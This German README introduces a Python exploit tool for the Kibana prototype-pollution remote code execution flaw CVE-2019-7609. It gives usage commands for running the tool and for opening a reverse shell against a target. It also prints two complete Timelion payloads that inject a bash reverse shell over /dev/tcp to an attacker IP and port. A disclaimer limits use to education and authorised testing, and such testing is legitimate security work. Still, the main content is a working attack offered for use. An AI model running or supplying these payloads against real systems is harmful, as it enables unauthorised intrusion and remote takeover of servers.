
Python-3-Exploit für Kibana < 6.6.1 RCE (CVE-2019-7609) über Prototype Pollution, mit automatischer Versionserkennung und optionaler Reverse Shell.
Autor: LandGrey (Python3-Refactoring von [Your Name])
Referenz: Exploit-DB 46651
CVE: CVE-2019-7609
⚠️ Haftungsausschluss:
Dieses Skript ist ausschließlich für Bildungszwecke und autorisierte Penetrationstests bestimmt. Verwenden Sie es nicht auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben. Der Autor und die Mitwirkenden übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Werkzeug verursacht werden.
Dies ist ein Python-3-Exploit-Skript für die Remotecode-Ausführungssicherheitslücke in Kibana-Versionen < 6.6.1. Es nutzt eine Prototyp-Verschmutzungsschwachstelle aus, um beliebige Befehle auszuführen, einschließlich des Startens einer Reverse Shell, auf einer verwundbaren Kibana-Instanz.
python3 kibana_exploit.py -u http://target-kibana:5601
Um eine Reverse Shell auszulösen:
python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT
python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444
requestspackagingInstallieren Sie die Abhängigkeiten mit:
pip install requests packaging
Sie können diese Sicherheitslücke auch manuell mit dem Timelion-Visualizer von Kibana ausnutzen:
Payload von securityMB:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Payload von chybeta:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Ersetzen Sie 192.168.1.100 und 4444 durch Ihre eigene Listener-IP und Ihren Port.
Das Skript liefert eine klare, schrittweise Ausgabe für Erkennung, Überprüfung und Ausnutzung, sodass es einfach zu befolgen und unterhaltsam zu verwenden ist!
Dieses Skript ist eine großartige Möglichkeit, etwas über Prototyp-Verschmutzung, Remotecode-Ausführung und Penetrationstesttechniken zu lernen. Verwenden Sie es verantwortungsvoll und immer mit Erlaubnis!
Dieses Projekt ist nur für Bildungszwecke gedacht. Keine Gewährleistung, keine Garantien. Hacken Sie ethisch, bleiben Sie neugierig und haben Sie Spaß!